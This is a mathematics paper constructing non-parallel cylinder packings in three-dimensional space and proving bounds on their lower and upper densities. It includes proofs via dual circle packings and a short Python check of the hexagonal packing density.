One can define two more notions of density: \[(\delta^{*})^{+}(\mathcal{C})=\limsup_{r\to\infty}\left(\sup_{x_{0}\in \mathbb{R}^{n}}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(x_{0})\cap\bigcup_{i =1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}\right)\] and \[(\delta^{*})^{-}(\mathcal{C})=\liminf_{r\to\infty}\left(\inf_{x_{0}\in \mathbb{R}^{n}}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(x_{0})\cap\bigcup_{i =1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}\right)\] In some cases these two quantities are more natural than \(\delta^{+}\) and \(\delta^{-}\) because they are invariant under translations and do not assign a special role to the origin. It is not hard to see that for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) one has that \((\delta^{*})^{+}(\mathcal{C})\geq\delta^{+}(\mathcal{C})\) and \((\delta^{*})^{-}(\mathcal{C})\leq\delta^{-}(\mathcal{C})\). But in fact one can do a reduction to the result of Bezdek and Kuperberg and show that \((\delta^{*})^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\) for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\). In 1997, Claudia and Peter Graf, [4], showed that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})=\frac{5}{12}\). In 2014, T. Hales proved that the maximal density of sphere packings is \(\frac{\pi}{3\sqrt{2}}\approx 0.7404\). His proof used complex computer calculations, and solved the Kepler conjecture, which was one of the most challenging open problems on this topic [5]. In 2018, D. Ismailescu and P. Laskawiec, [6], showed that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})=\frac{1}{2}\). They conjectured that for every non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) there exists a sequence of holes with radius tending to infinity, i.e., there exist sequences \(b_{n},r_{n}\to\infty\) as \(n\to\infty\) such that for all \(n\in\mathbb{N}\) one has that \(B(r_{n},b_{n})\cap(\bigcup_{i=1}^{\infty}(C_{i}))=\emptyset\), which implies that \((\delta^{*})^{-}(\mathcal{C})=0\) for every non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\). In Section 2 of this paper, we prove that for every \(\varepsilon>0\) there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})\geq\frac{\pi}{6}-\varepsilon\) (theorem 2.2). In Section 3, we show that there exists a non-parallel cylinder packing with \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\) (in particular, \((\delta^{*})^{+}=\frac{\pi}{\sqrt{12}}\)), i.e., a non-parallel cylinder packing with optimal upper density. This proves the aforementioned conjecture of K. Kuperberg. In fact we show a more general result, namely, we construct a non-parallel cylinder packing from a lattice circle packing, such that the upper density of the cylinder packing equals the density of the original circle packing. From now, we denote by O the origin, both in \(\mathbb{R}^{2}\) and both in \(\mathbb{R}^{3}\). 
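As a small numerical illustration of the density definitions above (and of the value \(\pi/\sqrt{12}\approx 0.9069\) quoted for the optimal circle packing), the following sketch estimates the fraction of a large disk covered by unit circles centered on the hexagonal lattice; the disk radius and sample count are arbitrary choices.

```python
# Monte Carlo estimate of the planar density of the hexagonal packing of unit
# circles inside a large disk B_R(0); the estimate should approach pi/sqrt(12).
import numpy as np

R = 300.0
rng = np.random.default_rng(0)
pts = rng.uniform(-R, R, size=(500_000, 2))
pts = pts[np.linalg.norm(pts, axis=1) < R]      # uniform samples in B_R(0)

# Circle centers form the lattice {i*a1 + j*a2}: nearest-neighbor distance 2,
# so the unit circles are tangent and have pairwise disjoint interiors.
a1 = np.array([2.0, 0.0])
a2 = np.array([1.0, np.sqrt(3.0)])
A = np.column_stack([a1, a2])
coords = pts @ np.linalg.inv(A).T               # lattice coordinates of each sample
base = np.floor(coords)

covered = np.zeros(len(pts), dtype=bool)
for di in (0, 1):
    for dj in (0, 1):
        centers = (base + [di, dj]) @ A.T       # the four surrounding lattice centers
        covered |= np.linalg.norm(pts - centers, axis=1) <= 1.0

print(covered.mean(), np.pi / np.sqrt(12))      # both should be close to 0.9069
```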
## 2 Existence of a cylinder packing with higher lower density **Theorem 2.1**.: _For every \(\varepsilon>0\), there are \(K,L>0\) which satisfy \(L^{2}=K^{2}+1\) and \(r_{0}>0\) such that the following holds: Let \(A_{1}=(x_{1},y_{1}),A_{2}=(x_{2},y_{2})\in\mathbb{R}^{2}\) be arbitrary points with integer Euclidean norms \(d_{1}=\|A_{1}\|\) and \(d_{2}=\|A_{2}\|\) which satisfy the two conditions_ \[d_{1},d_{2}\geq r_{0}\] _and_ \[\widetilde{c}\geq\frac{1+\varepsilon}{\max{(d_{1},d_{2})}},\] _where \(\widetilde{c}\) is the angle between the lines that pass through the points \(O\) and \(A_{1}\) and \(O\) and \(A_{2}\), respectively, i.e., \(\widetilde{c}=\angle A_{1}OA_{2}\)._ _Then_ \[\operatorname{dist}(\ell_{1},\ell_{2})\geq 1,\] _where \(\ell_{1}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},Kd_{1}+L):t\in\mathbb{R}\}\), \(\ell_{2}=\{(x_{2},y_{2},0)+t(y_{2},-x_{2},Kd_{2}+L):t\in\mathbb{R}\}\)_ Proof.: Let \(\varepsilon>0\). By Ismailescu and Laskawiec's calculation in [6], Lemma 3.4, we have that \[(\mbox{dist}(\ell_{1},\ell_{2}))^{2}=\] \[\frac{(1-c)^{2}d_{1}^{2}d_{2}^{2}\gamma^{2}+2L(1-c)d_{1}d_{2}\gamma(d_{2}-d_{1} )^{2}+L^{2}(d_{2}-d_{1})^{4}}{-(1-c)^{2}d_{1}^{2}d_{2}^{2}+2(1-c)d_{1}d_{2}[L^{2} (1+d_{1}d_{2})+KL(d_{1}+d_{2})]+L^{2}(d_{2}-d_{1})^{2}}, \tag{1}\] where \(c=\cos\widetilde{c}\) and \(\gamma=(Kd_{1}+Kd_{2}+2L)\). The constants \(L,K\) will be chosen to satisfy: 1. \[K^{2}>\frac{1+0.25\varepsilon}{1+0.5\varepsilon}L^{2}\] 2. \[\forall h>0:\quad\frac{1+2\varepsilon+\frac{\varepsilon^{2}}{2}}{2(1+h)}(2+h) ^{2}K^{2}\geq\frac{1+2\varepsilon}{2}\cdot\frac{(2+h)^{2}}{1+h}L^{2}\] 3. \[K^{2}\geq 0.99L^{2}\] which is clearly satisfied for \(L\) large enough since \(L^{2}=K^{2}+1\). Then, the constant \(r_{0}\) will be chosen such that for every \(d_{1}>r_{0}\): 1. \[1-\cos\left(\frac{1+\varepsilon}{d_{1}}\right)>\frac{1+0.25\varepsilon}{2d_{1 }^{2}}\] by Taylor expansion of order 2 of the function \(\cos x\), clearly this is satisfied for \(r_{0}\) large enough for all \(d_{1}\geq r_{0}\). 2. \[L^{2}+2KLd_{1}<0.25\varepsilon L^{2}d_{1}^{2}\] 3. \[\forall h>0\] \[\left[(1+2\varepsilon)\left(2+\frac{h^{2}}{2(1+h)}\right)+4h^{2}-2h-2-\frac{2}{ d_{1}^{2}}\right]\geq 3.999\varepsilon+4h^{2}-2h\] 4. \[\frac{1}{100}[L^{2}\delta^{2}d_{1}^{2}(\delta^{2}d_{1}^{2}-1)]\geq 2.5L^{2}d_{1}^{2}.\] which clearly holds when \(r_{0}\) is large enough for all \(d_{1}\geq r_{0}\). We consider two separate cases. Case 1: \(d_{1}=d_{2}\), note that in this case \[\left(\mathrm{dist}(\ell_{1},\ell_{2})\right)^{2}= \frac{(1-c)^{2}d_{1}^{4}\gamma^{2}}{-(1-c)^{2}d_{1}^{4}+2(1-c)d_{1 }^{2}[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\geq\frac{(1-c)^{2}d_{1}^{4}\gamma^{2}}{2(1-c)d_{1}^{2}[L^{2}(1+d_ {1}^{2})+2KLd_{1}]}\] \[=\frac{(1-c)d_{1}^{2}\gamma^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\geq\frac{(1-\cos(\frac{1+\varepsilon}{d_{1}})d_{1}^{2}\gamma^{2} }{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]},\] \[\underset{(i)}{\geq}\frac{\frac{1+0.5\epsilon}{2d_{1}^{2}}d_{1} ^{2}\gamma^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]},\] \[\underset{(1)}{\geq}\frac{\frac{1+0.25\epsilon}{2d_{1}^{2}}d_{1 }^{2}(2Ld_{1})^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\underset{(ii)}{\geq}\frac{2L^{2}d_{1}^{2}(1+0.25\epsilon)}{2L^{ 2}d_{1}^{2}(1+0.25\epsilon)}=1,\] which completes the proof for this case. Case 2: \(d_{1}\neq d_{2}\). 
From (1), an algebraic manipulation shows that \(\mathrm{dist}(\ell_{1},\ell_{2})\geq 1\) if and only if \(\Delta\geq 0\), where \[\Delta =(1-c)^{2}d_{1}^{2}d_{2}^{2}\big{[}1+\gamma^{2}\big{]}+L^{2}(d_{2 }-d_{1})^{2}\big{[}(d_{2}-d_{1})^{2}-1)\big{]}\] \[+2(1-c)d_{1}d_{2}\big{[}KL(d_{1}+d_{2})((d_{2}-d_{1})^{2}-1)+L^{2 }(2d_{1}^{2}-5d_{1}d_{2}+2d_{1}^{2}-1)\big{]}.\] Denote \[(2)\ \ \ \ \widetilde{\Delta}=(1-c)d_{1}d_{2}(1+\gamma^{2})+2L^{2}(2d_{1}^{ 2}-5d_{1}d_{2}+2d_{1}^{2}-1)\] and \[\widetilde{\widetilde{\Delta}}=\bigg{[}\frac{1}{(1-c)d_{1}d_{2}}L^{2}\big{(} d_{2}-d_{1}\big{)}^{2}+2KL\big{(}d_{2}+d_{1}\big{)}\bigg{]}\,\big{[}(d_{2}-d_{1})^{2} -1\big{]}.\] Then \(\Delta=(1-c)d_{1}d_{2}(\widetilde{\Delta}+\widetilde{\widetilde{\Delta}})\). For every \(d_{1}\neq d_{2}\) we have \((d_{2}-d_{1})^{2}-1\geq 0\) (since \(d_{1},d_{2}\) are integers), so \(\widetilde{\widetilde{\Delta}}\geq 0\). Consequently, if \(\widetilde{\Delta}\geq 0\), then \(\Delta\geq 0\). Assume without loss of generality that \(d_{1}<d_{2}\). Denote \(d_{2}=(1+h)d_{1}\), where \(h>0\). Then \[\widetilde{\Delta}\geq\bigg{[}1-\cos\frac{1+\varepsilon}{(1+h)d_{1 }}\bigg{]}\cdot(1+h)d_{1}^{2}\big{(}K(2+h)d_{1}\big{)}^{2}\] \[\qquad+2L^{2}\big{[}d_{1}^{2}(2+2(1+h)^{2}-5(1+h))-1\big{]}\] \[\underset{\text{Taylor}}{=}\frac{1}{2}\bigg{[}\frac{1+\varepsilon} {(1+h)d_{1}}\bigg{]}^{2}\cos\widetilde{x}\big{(}1+h)^{2}d_{1}^{2}\big{(}(2+h) Kd_{1}\big{)}^{2}\] \[\qquad+2L^{2}\big{[}d_{1}^{2}(2h^{2}-h-1)-1\big{]},\] where \(0\leq\widetilde{x}\leq\frac{1+\varepsilon}{(1+h)d_{1}}\). Note that \(\widetilde{x}\to 0\) when \(d_{1}\to\infty\), and since \(\lim_{x\to 0}\cos x=1\), for \(d_{1}\) large enough we have \((1+\varepsilon)^{2}\cos x>1+2\varepsilon+\frac{\varepsilon^{2}}{2}\). It follows that \[\widetilde{\Delta}\geq\frac{1+2\varepsilon+\frac{\varepsilon^{2}} {2}}{2(1+h)^{2}d_{1}^{2}}(1+h)d_{1}^{2}(2+h)^{2}d_{1}^{2}K^{2}+2L^{2}\big{[}d_ {1}^{2}(2h^{2}-h-1)-1\big{]}\] \[\qquad=\frac{1+2\varepsilon+\frac{\varepsilon^{2}}{2}}{2(1+h)}(2 +h)^{2}d_{1}^{2}K^{2}+L^{2}d_{1}^{2}\left[2(2h^{2}-h-1)-\frac{2}{d_{1}^{2}}\right]\] \[\underset{\text{(2)}}{\geq}\frac{1+2\varepsilon}{2}\cdot\frac{( 2+h)^{2}}{1+h}L^{2}d_{1}^{2}+L^{2}d_{1}^{2}\left[2(2h^{2}-h-1)-\frac{2}{d_{1}^{ 2}}\right]\] \[\qquad=L^{2}d_{1}^{2}\left[(1+2\varepsilon)\left(2+\frac{h^{2}}{ 2(1+h)}\right)+4h^{2}-2h-2-\frac{2}{d_{1}^{2}}\right]\] \[\underset{\text{(iii)}}{\geq}L^{2}d_{1}^{2}(3.999\varepsilon+4h^ {2}-2h).\] We see that for \(L\) and \(d_{1}\) large enough, (3) \(\widetilde{\Delta}\geq L^{2}d_{1}^{2}(3.999\varepsilon+4h^{2}-2h)\). Now let \(\delta\geq 0\) be such that for every \(0\leq h\leq\delta\) we have \(4h^{2}-2h\geq-\varepsilon\). Then, for every \(0\leq h\leq\delta\) we get \[\Delta=(1-c)d_{1}d_{2}(\widetilde{\Delta}+\widetilde{\widetilde{\Delta}})\geq( 1-c)d_{1}d_{2}\widetilde{\Delta}\geq(1-c)(3.99\varepsilon-\varepsilon)\geq 0.\] For \(h\geq\delta\) we consider two cases: 1. If \((1-c)d_{1}d_{2}\leq 100\), then \[\widetilde{\widetilde{\Delta}}\geq\frac{1}{100}[L^{2}\delta^{2}d_{1}^{2}( \delta^{2}d_{1}^{2}-1)]\underset{\text{(iv)}}{\geq}2.5L^{2}d_{1}^{2}.\] Since for every \(h\geq 0\) the inequality \(4h^{2}-2h\geq-2\) holds, we get that \[\begin{split}\Delta&=(1-c)d_{1}d_{2}(\widetilde{ \Delta}+\widetilde{\widetilde{\Delta}})\geq(1-c)d_{1}d_{2}L^{2}d_{1}^{2}(2.5+3.9 \varepsilon+4h^{2}-2h)\\ &\geq(1-c)d_{1}d_{2}L^{2}d_{1}^{2}(0.5+4h^{2}+3.99\varepsilon) \geq 0.\end{split}\] 2. If \((1-c)d_{1}d_{2}\geq 100\), we again consider two separate cases: 1. 
If \(h\leq 1\), then, by the definition of \(\widetilde{\Delta}\) (2), we get that \[\widetilde{\Delta}\geq 100(1+\gamma^{2})-2L^{2}\cdot 10d_{1}^{2}\underset{(3)}{ \geq}9B^{2}d_{1}^{2}-20L^{2}d_{1}^{2}\geq 0,\] and so \(\Delta\geq 0\). 2. If \(h>1\), then \(4h^{2}-2h\geq 2h\geq 0\), and using (3) we get that \[\Delta\geq(1-c)d_{1}d_{2}\widetilde{\Delta}\geq(1-c)L^{2}d_{1}^{2}(3.99 \varepsilon+4h^{2}-2h)\geq 0.\] Thus, for every \(h>0\) we have \(\Delta\geq 0\), which completes the proof. **Theorem 2.2**.: _For every \(\varepsilon>0\), there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with lower density \(\delta^{-}(\mathcal{C})\geq\frac{\pi}{6}-\varepsilon\)._ Construction: Let \(\varepsilon>0\), and let \(L,K,r_{0}\) be three (large enough) constants such that the statement of theorem 2.1 holds for these values. For each \(n\geq r_{0}\), let \(k\) be the (unique) natural number such that \(2^{k}\leq n<2^{k+1}\). We define \[\mathcal{A}_{n}=\left\{n\left(\cos\frac{(1+\varepsilon)\cdot j}{2^{k}},\sin \frac{(1+\varepsilon)\cdot j}{2^{k}},0\right)\ \Big{|}1\leq j\leq\frac{2\pi}{1+\varepsilon}\cdot 2^{k }\right\}\] Now for every \(n\geq r_{0}\) we draw from every point \(A=(x,y,0)\in\mathcal{A}_{n}\) the line \(\ell_{A}=(x,y,0)+t(y,-x,Kn+L)\), and then around each such line we take the cylinder of radius \(\frac{1}{2}\). Let \(C_{n}\) be the set of all the cylinders corresponding to \(n\). For every \(2\) cylinders as above (which might correspond to the same \(n\) or to distinct values of \(n\)), if they come from \(2\) points which lie on a straight line with the origin, the axes lie in \(2\) parallel planes which are perpendicular to the xy-plane and the distance between them is at least \(1\), so the distance between the axes is at least \(1\). Else, for every \(n_{1}\geq n_{0}\), for \(i=0,1\) let \(k_{i}\) be the (unique) natural number such that \(2^{k_{i}}\leq n_{i}<2^{k_{i}+1}\). Let \(A_{0}\in\mathcal{A}_{0}\), \(A_{1}\in\mathcal{A}_{1}\), and assume that \(A_{0}\), \(A_{1}\), O not lie on a straight line. Clearly that \(\angle A_{0}OA_{1}\) is of the form \(\frac{(1+\varepsilon)\cdot m}{2^{k_{1}}}\) for an integer \(m\). Since \(2^{k_{1}}\leq\|A_{1}\|\) the assumptions of theorem 2.1 are satisfied. Then, by theorem 2.1, the distance between the axes is at least 1. So the cylinders are disjoint and it's a cylinder packing. Denote the resulting cylinder packing by \(\mathcal{C}\) (the union about all \(n\geq r_{0}\)). That is, \(\mathcal{C}=\bigcup_{n\geq r_{0}}C_{n}\). **Definition 2.1**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing such that the axes of all the cylinders in \(C_{i}\) intersect the \((x,y)\)-plane. The_ **dual circle packing** _of \(\mathcal{C}\), denoted \(\widetilde{\mathcal{C}}\), is the circle packing in the plane that consists of all the circles that are centered at the points where the axes of the cylinders \(C_{i}\) intersect the \((x,y)\)-plane and each circle has the same radius as the corresponding cylinder._ **Definition 2.2**.: _Let \(C\) be a cylinder with axis that intersects the \((x,y)\)-plane, but not contained in this plane. 
The_ **dual cylinder** _of \(C\), denoted \(C^{*}\), has the same radius as \(C\), and its axis is the line that passes through the point where the axis of \(C\) intersects the \((x,y)\)-plane and is perpendicular to the \((x,y)\)-plane._ **Lemma 2.3**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing with the property that for every \(i\) the axis of \(C_{i}\) intersects the \((x,y)\)-plane in a point \(A_{i}\) and is perpendicular to the line \(OA_{i}\). Let \(\widetilde{\mathcal{C}}\) be the dual circle packing of \(\mathcal{C}\). Then \(\delta^{+}(\mathcal{C})=\delta^{+}(\widetilde{\mathcal{C}})\) and \(\delta^{-}(\mathcal{C})=\delta^{-}(\widetilde{\mathcal{C}})\)._ Proof.: If the axes of all the cylinders \(C_{i}\) are perpendicular to the \((x,y)\)-plane, the lemma follows from Fubini's theorem: for every plane of the form \(z=a\), the intersection of the plane with a ball centered at the origin is a disc, and the intersection of this disc with the cylinders is a lift of the intersection of \(\widetilde{\mathcal{C}}\) with the projection of the disc to the \((x,y)\)-plane. We can therefore use the density of \(\widetilde{\mathcal{C}}\) in all of these discs except in two domes near the poles, which are negligible when the radius of the ball is large. In the general case, we claim that for every cylinder \(C_{i}\) and every \(r>0\), \[\operatorname{Vol}(C_{i}\cap B_{r}^{3}(0))=\operatorname{Vol}(C_{i}^{*}\cap B_{r}^{3}(0)),\] which clearly completes the proof. To prove the claim, we note that the axis of the dual cylinder \(C_{i}^{*}\) is the image of the axis of \(C_{i}\) under a rotation \(T\) around the line \(OA_{i}\). Since \(T\) is an isometry, \(d(x,\ell)=d(T(x),T(\ell))\) for every line \(\ell\), in particular for \(\ell_{A_{i}}\). Denote \(\ell=\ell_{A_{i}}\) for simplicity and let \(\rho\) be the radius of \(C_{i}\). Therefore, if \(d(x,\ell)<\rho\), then \(d(T(x),T(\ell))<\rho\), and conversely, if \(d(y,T(\ell))<\rho\), then \[d(T^{-1}(y),\ell)=d\big{(}T^{-1}(y),T^{-1}(T(\ell))\big{)}<\rho\] since \(T\) is one-to-one. Hence, \(C_{i}^{*}=T(C_{i})\), and since \(O\) lies on \(OA_{i}\), necessarily \(T(O)=O\). Moreover, since \(T\) is an isometry, \(\|T(x)\|=\|x\|\) for all \(x\in\mathbb{R}^{3}\), so \(C_{i}^{*}\cap B_{r}^{3}(0)=T(C_{i}\cap B_{r}^{3}(0))\). We conclude that \(\operatorname{Vol}(C_{i}^{*}\cap B_{r}^{3}(0))=\operatorname{Vol}(T(C_{i}\cap B_{r}^{3}(0)))=\operatorname{Vol}(C_{i}\cap B_{r}^{3}(0))\), since \(T\) preserves volume, which completes the proof of the claim.
Since for \(2^{n}<k\leq 2^{n+1}\) the density of centers (number of centers of circles of the circle packing divided by the area) in annulus of the form \(D_{k}=B_{k}^{2}(0)/B_{2^{n}}^{2}(0)\) is decreasing as a function of k, it's easy to show that the density of centers in \(B_{k}^{2}(0)\) is at least the minimum of the densities in \(B_{2^{n}}^{2}(0)\) and \(B_{2^{n+1}}^{2}(0)\), so we can't get a lower partial limit. Let \(\mathcal{U}_{n}\) denote the union of the circles in \(\widetilde{\mathcal{C}}\) with center of norm \(r\) such that \(2^{n}\leq r<2^{n+1}\). Then since \[\lim_{n\to\infty}\frac{\operatorname{Area}(\mathcal{U}_{n})}{ \operatorname{Area}(B_{2^{n+1}}^{2}(0))-\operatorname{Area}(B_{2^{n}}^{2}(0))}\] \[=\lim_{n\to\infty}\frac{\frac{\pi}{4}\cdot 2^{n}\cdot\frac{2}{1+ \varepsilon}\cdot 2^{n}}{3\pi\cdot 2^{2n}}\] \[=\frac{\pi}{6(1+\varepsilon)},\] Stolz's theorem implies that: 1. \[\lim_{n\to\infty}\frac{\operatorname{Area}(B_{2^{n}}^{2}(0)\cap\widetilde{ \mathcal{C}})}{\operatorname{Area}(B_{2^{n}}^{2}(0))}=\frac{\pi}{6(1+ \varepsilon)}.\] It follows that \(\delta^{-}(\mathcal{C})=\frac{\pi}{6(1+\varepsilon)}{\to}\frac{\pi}{6}\) as \(\varepsilon\to 0\), which completes the proof. **Theorem 2.4**.: _The upper density of the previous construction is \(\delta^{+}(C)=\frac{3\pi}{16(1+\varepsilon)}\)._ Proof.: let \(c\), \(0\leq c\leq 1\), be an arbitrary constant and consider the subsequence \(n_{k}=2^{k}(1+c)\). Then, using (i) we get that \[\lim_{n\to\infty}\frac{\operatorname{Area}(B_{n_{k}}^{2}(0)\cap \widetilde{\mathcal{C}})}{\operatorname{Area}(B_{n_{k}}^{2}(0))}\] \[=\lim_{n\to\infty}\frac{\operatorname{Area}(B_{2^{k}}^{2}(0) \cap\widetilde{\mathcal{C}})+\operatorname{Area}(B_{n_{k}}^{2}(0))\cap \widetilde{\mathcal{C}}/B_{2^{k}}^{2}(0))}{\operatorname{Area}(B_{n_{k}}^{2}( 0))}\] \[=\frac{\frac{\pi}{6(1+\varepsilon)}\cdot\operatorname{Area}(B_{2^ {k}}^{2}(0))(1+o(1))+2^{k}\cdot c\cdot 2^{k}\cdot\frac{\pi}{4}\cdot\frac{2\pi}{1+ \varepsilon}}{\pi(2^{k}(1+c))^{2}}\] \[=\frac{\pi\cdot(1+3c)}{6(1+\varepsilon)(1+c)^{2}}.\] **Lemma 2.5**.: _Let \(\{a_{n}\}_{n=1}^{\infty}\) be a sequence, and let \(A\) be a set of convergent subsequences of \(\{a_{n}\}_{n=1}^{\infty}\) which cover the sequence. Assume that for every \(\varepsilon>0\) there exists \(M>0\) such that for every \(n>M\) and every subsequence in \(A\) which includes \(a_{n}\), \(|a_{n}-l|<\varepsilon\) where \(l\) is the limit of the subsequence. Let \(B\) be the set of partial limits of subsequences in \(A\), then \(B\) has a maximum and_ \[\limsup_{n\to\infty}a_{n}=\max B\] Proof.: the proof is easy and it's an exercise to the reader. Since for every \(\varepsilon>0\) there exists a \(k_{0}\in\mathbb{N}\), uniform in \(c\), such that \[\left|\frac{\operatorname{Area}(B_{n_{k}}^{2}(0)\cap\widetilde{\mathcal{C}}) }{\operatorname{Area}(B_{n_{k}}^{2}(0))}-\frac{\pi\cdot(1+3c)}{6(1+\varepsilon )(1+c)^{2}}\right|<\varepsilon,\] for every \(k\geq k_{0}\), we can use lemma 2.5 and conclude that \[\delta^{+}(C) =\limsup_{r\to\infty}\frac{\operatorname{Vol}(B_{r}^{3}(0)\cap \widetilde{\mathcal{C}})}{\operatorname{Vol}(B_{r}^{3}(0))}\] \[=\max_{0\leq c\leq 1}\frac{\pi\cdot(1+3c)}{6(1+\varepsilon)(1+c )^{2}}\] \[=\frac{3\pi}{16(1+\varepsilon)}\] (In order to calculate the maximum we looked at the derivative and set it equal to \(0\)). 
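Explicitly, the maximization over \(c\) mentioned above is an elementary calculus computation, included here only for completeness:
\[
\frac{d}{dc}\,\frac{1+3c}{(1+c)^{2}}=\frac{3(1+c)^{2}-2(1+c)(1+3c)}{(1+c)^{4}}=\frac{1-3c}{(1+c)^{3}}=0\ \Longrightarrow\ c=\tfrac{1}{3},
\]
\[
\max_{0\leq c\leq 1}\frac{\pi\cdot(1+3c)}{6(1+\varepsilon)(1+c)^{2}}=\frac{\pi}{6(1+\varepsilon)}\cdot\frac{2}{(4/3)^{2}}=\frac{\pi}{6(1+\varepsilon)}\cdot\frac{9}{8}=\frac{3\pi}{16(1+\varepsilon)},
\]
and the values at the endpoints \(c=0\) and \(c=1\) both equal \(\frac{\pi}{6(1+\varepsilon)}\), which is smaller.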
**Corollary 2.6**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing with the property that for every \(i\) the axis of \(C_{i}\) intersects the \((x,y)\)-plane in a point \(A_{i}\) such that the axis is perpendicular to the line \(OA_{i}\), and such that the set of the intersection points of the axes with the \((x,y)\)-plane satisfies:_ 1. _The points have integer norm._ 2. _The distance between any two of the points is at least 1._ _Then \(\delta^{+}(\mathcal{C})\leq\frac{3\pi}{16}\)._ Proof.: The proof is very similar to the proof of theorem 2.4, and is left as an exercise to the reader. ## 3 Existence of a non-parallel cylinder packing with upper density \(\frac{\pi}{\sqrt{12}}\) Consider the following two sequences, defined recursively: 1. \(a_{1}=1\), \(a_{k+1}=100a_{k}\). 2. \(T_{1}=1\), \(T_{k+1}=2^{10a_{k+1}}\cdot T_{k}\). For every \(k\in\mathbb{N}\), define \(\Omega_{k}=\{x\in\mathbb{R}^{2}|\,2^{a_{k}}<\|x\|\leq 2^{2a_{k}}\}\), and for every \(x=(x_{1},y_{1},0)\in\Omega_{k}\) (identifying the \((x,y)\)-plane with \(\mathbb{R}^{2}\)), consider the straight line \(\ell_{x}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},T_{k}):t\in\mathbb{R}\}\). **Lemma 3.1**.: _For any pair of distinct points \(p_{1},p_{2}\in\bigcup_{k=1}^{\infty}\Omega_{k}\), the lines \(\ell_{1}=\ell_{p_{1}}\) and \(\ell_{2}=\ell_{p_{2}}\) are not parallel._ Proof.: Assume, by contradiction, that \(\ell_{1}\) and \(\ell_{2}\) are parallel. Denote \(p_{1}=(x_{1},y_{1})\) and \(p_{2}=(x_{2},y_{2})\), and assume that \(p_{1}\in\Omega_{k_{1}}\) and \(p_{2}\in\Omega_{k_{2}}\), \(k_{2}\geq k_{1}\). Then there exists \(c\in\mathbb{R}\) such that \((y_{2},-x_{2},T_{k_{2}})=c(y_{1},-x_{1},T_{k_{1}})\). If \(k_{1}=k_{2}\), then \(c=1\) and so \((x_{1},y_{1})=(x_{2},y_{2})\), a contradiction. Now suppose that \(k_{1}\neq k_{2}\). Then \[(*)\ \ \ \ \frac{T_{k_{2}}}{T_{k_{1}}}=c=\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}.\] For every \(k\in\mathbb{N}\) and points \(p_{1}\in\Omega_{k}\), \(p_{2}\in\Omega_{k+1}\), we have \(\frac{T_{k+1}}{T_{k}}=2^{1000a_{k}}\) (since \(10a_{k+1}=1000a_{k}\)) and \[\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}\leq\|(x_{2},y_{2})\|\leq 2^{200a_{k}}<2^{1000a_{k}}=\frac{T_{k+1}}{T_{k}}.\] Hence, by induction, for any two points \(p_{1}\in\Omega_{k_{1}}\) and \(p_{2}\in\Omega_{k_{2}}\) (\(k_{2}>k_{1}\)) we have \[\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}<\frac{T_{k_{2}}}{T_{k_{1}}},\] which contradicts the equality in \((*)\). Therefore, \(\ell_{1}\) and \(\ell_{2}\) are not parallel. **Theorem 3.2**.: _There exists \(k_{0}\in\mathbb{N}\) such that for every \(\varepsilon>0\) there exists \(m_{0}\in\mathbb{N}\) such that the following holds: for any pair \(k_{2}>m_{0}\), \(k_{1}>k_{0}\) with \(k_{2}>k_{1}\), and any pair of points \(A_{1}\in\Omega_{k_{1}}\) and \(A_{2}\in\Omega_{k_{2}}\) satisfying condition (1) \(|c|\geq\frac{1}{d_{2}^{0.975}}\), where \(c=\cos\theta\) and \(\theta\) is the angle between the line that passes through the points \(O\) and \(A_{1}\) and the line that passes through \(O\) and \(A_{2}\), we have_ \[\mathrm{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon)d_{1}\] (_in particular, \(\mathrm{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon)\)), where \(d_{1}=\|A_{1}\|\), \(d_{2}=\|A_{2}\|\), \(\ell_{1}=\ell_{A_{1}}\), \(\ell_{2}=\ell_{A_{2}}\)._ Proof of theorem 3.2.: Denote \(T_{1}^{\prime}=T_{k_{1}}\), \(T_{2}^{\prime}=T_{k_{2}}\) and let \(v_{1},v_{2}\) be the direction vectors of \(\ell_{1},\ell_{2}\), respectively.
